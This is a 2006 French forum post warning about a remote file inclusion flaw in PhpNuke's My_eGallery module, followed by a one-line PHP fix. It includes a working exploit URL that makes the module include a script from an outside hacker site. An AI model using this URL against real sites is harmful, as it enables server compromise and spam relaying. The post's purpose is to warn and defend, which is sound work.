Auteur Sujet: PhpNuke : My_Egallery  (Lu 9828 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne cheminots

  • Connaisseur
  • ***
  • Messages: 429
    • http://www.cheminots.be
PhpNuke : My_Egallery
« le: 21 juillet 2006 à 00:12:29 »
Bonjour à tous.

My egallery n'est plus suivi. Soit.

Malheureusement, un petit comique à réussi à trouver une faille qui fait des ravages. (essayez votredomaine.tld/modules/My_eGallery/public/displayCategory.php?basepath=http://www.hackercenter.org/sh/rs57.txt? par exemple. Ce n'est pas la pire, ce n'est qu'un mailer, m'enfin bon, je ne donne pas des cours de hacking). Ceci fonctionne même si vous avez patché votre module en définissant votre basepath en chemin absolu.

La solution ? : dans public/displaycategory.php, /public/index.php et dans index.php, ajoutez

if (isset($_GET['basepath'])||isset($_POST['basepath'])) die ("Nice try");

(j'aurais pu ajouter les cookies aussi)

Ca vous protège, et ca empeche le spam aussi.
Cette faille permet de remonter jusqu'au root (pas avec l'url que j'ai donné, mais elle existe) d'un serveur qui n'a ni le safe mode, ni l'open_basedir. Avis aux proprio d'un dédié qui hébergent un site PhpNuke...

Note : dsl pour les néophytes, je ne suis pas très clair. Mais comme on dit dans ce cas, google est ton ami :)
Note2 : à tester sur d'aures CMS ou scripts
www.cheminots.be
Le Portail des Cheminots et des amis du rail